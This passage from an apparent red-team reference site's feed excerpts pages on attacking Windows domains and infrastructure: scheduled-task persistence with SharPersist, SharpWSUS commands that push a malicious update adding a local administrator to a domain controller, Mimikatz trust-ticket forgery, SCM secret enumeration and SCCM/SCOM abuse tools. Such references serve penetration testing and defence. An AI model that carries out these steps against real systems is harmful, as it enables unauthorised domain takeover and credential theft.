&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SharPersist&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="n"&gt;schtask&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;C:\Windows\System32\cmd.exe&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-a&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;/c calc.exe&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Some Task&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;add&lt;/span&gt; &lt;span class="n"&gt;-o&lt;/span&gt; &lt;span class="n"&gt;hourly&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SharPersist&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="n"&gt;schtask&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Some Task&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;remove&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="resource-kit" class="anchored-heading"&gt;Resource Kit&lt;a class="heading-anchor" href="#resource-kit" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;The Resource Kit is Cobalt Strike&amp;rsquo;s means to change the HTA, PowerShell, Python, VBA, and VBS script templates Cobalt Strike uses in its workflows&lt;/p&gt;</description></item><item><title>Deployment - MDT</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/deployment-mdt/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/deployment-mdt/</guid><description>&lt;p&gt;Microsoft Deployment Toolkit (MDT) is a free tool from Microsoft used to automate the deployment of Windows operating systems and applications.&lt;/p&gt;
&lt;p&gt;It lets IT admins create a central deployment share with OS images, drivers, updates, and apps, then use automated scripts (task sequences) to install them on multiple computers, either over the network (Lite Touch) or from media (USB/DVD).&lt;/p&gt;
&lt;h2 id="deployment-share" class="anchored-heading"&gt;Deployment Share&lt;a class="heading-anchor" href="#deployment-share" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;These files contains credentials used by Microsoft Deployment Toolkit to join a computer to the domain and to access network resources.&lt;/p&gt;</description></item><item><title>Deployment - SCCM</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/deployment-sccm/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/deployment-sccm/</guid><description>&lt;blockquote&gt;
&lt;p&gt;SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="sccm-application-deployment" class="anchored-heading"&gt;SCCM Application Deployment&lt;a class="heading-anchor" href="#sccm-application-deployment" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Application Deployment is a process that involves packaging software applications and distributing them to selected computers or devices within an organization&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Tools&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/PowerShellMafia/PowerSCCM"&gt;PowerShellMafia/PowerSCCM - PowerShell module to interact with SCCM deployments&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/nettitude/MalSCCM"&gt;nettitude/MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Exploitation&lt;/strong&gt;:&lt;/p&gt;</description></item><item><title>Deployment - SCOM</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/deployment-scom/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/deployment-scom/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Microsoft SCOM (System Center Operations Manager) is a monitoring tool used to oversee the health and performance of servers, applications, and infrastructure in IT environments. It collects data from systems, generates alerts for issues, and provides dashboards and reports for administrators.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/breakfix/SharpSCOM"&gt;breakfix/SharpSCOM&lt;/a&gt; - A C# utility for interacting with SCOM.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/nccgroup/SCOMDecrypt"&gt;nccgroup/SCOMDecrypt&lt;/a&gt; - SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="scom-runas-credentials" class="anchored-heading"&gt;SCOM “RunAs” credentials&lt;a class="heading-anchor" href="#scom-runas-credentials" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="recovery-from-scom-database" class="anchored-heading"&gt;Recovery from SCOM database&lt;a class="heading-anchor" href="#recovery-from-scom-database" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;The location of the SCOM database containing the RunAs credentials can be found by querying the following registry keys:&lt;/p&gt;</description></item><item><title>Deployment - WSUS</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/deployment-wsus/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/deployment-wsus/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates. You can use WSUS to fully manage the distribution of updates that are released through Microsoft Update to computers on your network&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;:warning: The payload must be a Microsoft signed binary and must point to a location on disk for the WSUS server to load that binary.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/nettitude/SharpWSUS"&gt;SharpWSUS&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt;Locate using &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate&lt;/code&gt; or &lt;code&gt;SharpWSUS.exe locate&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;After WSUS Server compromise: &lt;code&gt;SharpWSUS.exe inspect&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Create a malicious patch: &lt;code&gt;SharpWSUS.exe create /payload:&amp;quot;C:\Users\ben\Documents\pk\psexec.exe&amp;quot; /args:&amp;quot;-accepteula -s -d cmd.exe /c \&amp;quot;net user WSUSDemo Password123! /add ^&amp;amp; net localgroup administrators WSUSDemo /add\&amp;quot;&amp;quot; /title:&amp;quot;WSUSDemo&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Deploy it on the target: &lt;code&gt;SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:&amp;quot;Demo Group&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Check status deployment: &lt;code&gt;SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Clean up: &lt;code&gt;SharpWSUS.exe delete /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:”Demo Group&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;</description></item><item><title>Docker</title><link>https://bokkapig.pages.dev/refs/internal/containers/docker/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/containers/docker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mounted-docker-socket"&gt;Mounted Docker Socket&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#open-docker-api-port"&gt;Open Docker API Port&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#insecure-docker-registry"&gt;Insecure Docker Registry&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#exploit-privileged-container-abusing-the-linux-cgroup-v1"&gt;Exploit privileged container abusing the Linux cgroup v1&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#abusing-cap_sys_admin-capability"&gt;Abusing CAP_SYS_ADMIN capability&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#abusing-coredumps-and-core_pattern"&gt;Abusing coredumps and core_pattern&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#breaking-out-of-docker-via-runc"&gt;Breaking out of Docker via runC&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#breaking-out-of-containers-using-a-device-file"&gt;Breaking out of containers using a device file&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/kost/dockscan"&gt;kost/dockscan&lt;/a&gt; : Dockscan is security vulnerability and audit scanner for Docker installations&lt;/p&gt;</description></item><item><title>Elastic EDR</title><link>https://bokkapig.pages.dev/refs/internal/redteam/evasion/elastic-edr/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/evasion/elastic-edr/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Elastic EDR (Endpoint Detection and Response) is a component of Elastic Security designed to address cybersecurity threats at the endpoint level. It plays a crucial role in preventing, detecting, and responding to cyber threats like ransomware and malware.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/peasead/elastic-container"&gt;peasead/elastic-container&lt;/a&gt; - Stand up a simple Elastic container with Kibana, Fleet, and the Detection Engine&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="setup" class="anchored-heading"&gt;Setup&lt;a class="heading-anchor" href="#setup" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;First, you need &lt;code&gt;docker&lt;/code&gt; and the &lt;code&gt;docker-compose&lt;/code&gt; plugin&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Add Docker&amp;#39;s official GPG key:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;apt-get&lt;/span&gt; &lt;span class="n"&gt;update&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;apt-get&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;ca-certificates&lt;/span&gt; &lt;span class="nb"&gt;curl
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="mf"&gt;0755&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;etc&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;apt&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;keyrings&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;curl &lt;/span&gt;&lt;span class="n"&gt;-fsSL&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;download&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;docker&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;linux&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ubuntu&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;gpg&lt;/span&gt; &lt;span class="n"&gt;-o&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;etc&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;apt&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;keyrings&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;docker&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;asc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;chmod&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;+&lt;/span&gt;&lt;span class="nb"&gt;r &lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;etc&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;apt&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;keyrings&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;docker&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;asc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Add the repository to Apt sources:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo &lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;&amp;#34;deb [arch=&lt;/span&gt;&lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;dpkg&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-print-architecture&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="s2"&gt; signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu \
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$(.&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;etc&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nb"&gt;os-release&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;echo &lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt;&lt;span class="nv"&gt;$VERSION_CODENAME&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="s2"&gt; stable&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;\&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;tee &lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;etc&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;apt&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;sources&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;list&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;d&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;docker&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;list&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;dev&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;null&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;apt-get&lt;/span&gt; &lt;span class="n"&gt;update&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Install docker from apt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;apt-get&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;docker-ce&lt;/span&gt; &lt;span class="nb"&gt;docker-ce&lt;/span&gt;&lt;span class="n"&gt;-cli&lt;/span&gt; &lt;span class="n"&gt;containerd&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;io&lt;/span&gt; &lt;span class="nb"&gt;docker-buildx&lt;/span&gt;&lt;span class="n"&gt;-plugin&lt;/span&gt; &lt;span class="nb"&gt;docker-compose&lt;/span&gt;&lt;span class="n"&gt;-plugin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;You might want to grant the &lt;code&gt;docker&lt;/code&gt; right to the default user&lt;/p&gt;</description></item><item><title>Endpoint Detection and Response</title><link>https://bokkapig.pages.dev/refs/internal/redteam/evasion/edr-bypass/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/evasion/edr-bypass/</guid><description>&lt;p&gt;Endpoint Detection and Response (EDR) is a security solution that combines real-time monitoring, data collection, and advanced analytics to detect, investigate, and respond to cyber threats at the endpoint level. Leveraging machine learning algorithms and behavioral analysis, EDR tools can identify malicious activities, automate containment and remediation actions, and provide forensic insights to enhance an organization&amp;rsquo;s overall security posture.&lt;/p&gt;
&lt;h2 id="static-detection" class="anchored-heading"&gt;Static Detection&lt;a class="heading-anchor" href="#static-detection" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Mechanism&lt;/strong&gt;: Static detection is a security technique used in EDR and antivirus software that analyzes files and applications without executing them, typically based on predefined signatures or known malicious patterns.&lt;/p&gt;</description></item><item><title>Forest to Forest Compromise - Trust Ticket</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/trust-ticket/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/trust-ticket/</guid><description>&lt;ul&gt;
&lt;li&gt;Require: SID filtering disabled&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;From the DC, dump the hash of the &lt;code&gt;currentdomain\targetdomain$&lt;/code&gt; trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using
Mimikatz, adding the SID for the target domain&amp;rsquo;s enterprise admins group to our &lt;strong&gt;SID history&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="dumping-trust-passwords-trust-keys" class="anchored-heading"&gt;Dumping Trust Passwords (trust keys)&lt;a class="heading-anchor" href="#dumping-trust-passwords-trust-keys" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing &lt;strong&gt;$&lt;/strong&gt; are computer accounts, but some are trust accounts.&lt;/p&gt;</description></item><item><title>Hardcoded Secrets Enumeration</title><link>https://bokkapig.pages.dev/refs/internal/devops/secrets-enumeration/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/devops/secrets-enumeration/</guid><description>&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/synacktiv/nord-stream"&gt;synacktiv/nord-stream&lt;/a&gt; - List the secrets stored inside CI/CD environments and extract them by deploying malicious pipelines&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/xforcered/SCMKit"&gt;xforcered/SCMKit&lt;/a&gt; - Source Code Management Attack Toolkit&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="search-inside-repositories-files-and-codes" class="anchored-heading"&gt;Search inside Repositories, Files and Codes&lt;a class="heading-anchor" href="#search-inside-repositories-files-and-codes" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Discover repositories being used in a particular SCM system&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SCMKit&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;-s&lt;/span&gt; &lt;span class="n"&gt;gitlab&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;listrepo&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="n"&gt;userName&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;password&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;gitlab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;something&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SCMKit&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;-s&lt;/span&gt; &lt;span class="n"&gt;gitlab&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;listrepo&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="n"&gt;apiKey&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;gitlab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;something&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Search for repositories by repository name in a particular SCM system&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SCMKit&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;-s&lt;/span&gt; &lt;span class="n"&gt;github&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;searchrepo&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="n"&gt;userName&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;password&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;something&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="n"&gt;-o&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;some search term&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SCMKit&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;-s&lt;/span&gt; &lt;span class="n"&gt;gitlab&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;searchrepo&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="n"&gt;apikey&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;gitlab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;something&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="n"&gt;-o&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;some search term&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Search for code containing a given keyword in a particular SCM system&lt;/p&gt;</description></item><item><title>Hash - Capture and Cracking</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/hash-capture/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/hash-capture/</guid><description>&lt;h2 id="hash-cracking-table" class="anchored-heading"&gt;Hash Cracking Table&lt;a class="heading-anchor" href="#hash-cracking-table" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th style="text-align: right"&gt;Hashcat mode&lt;/th&gt;
 &lt;th&gt;Hash type&lt;/th&gt;
 &lt;th&gt;Generic hash format&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td style="text-align: right"&gt;&lt;code&gt;3000&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;LM&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;&amp;lt;LM_HASH&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
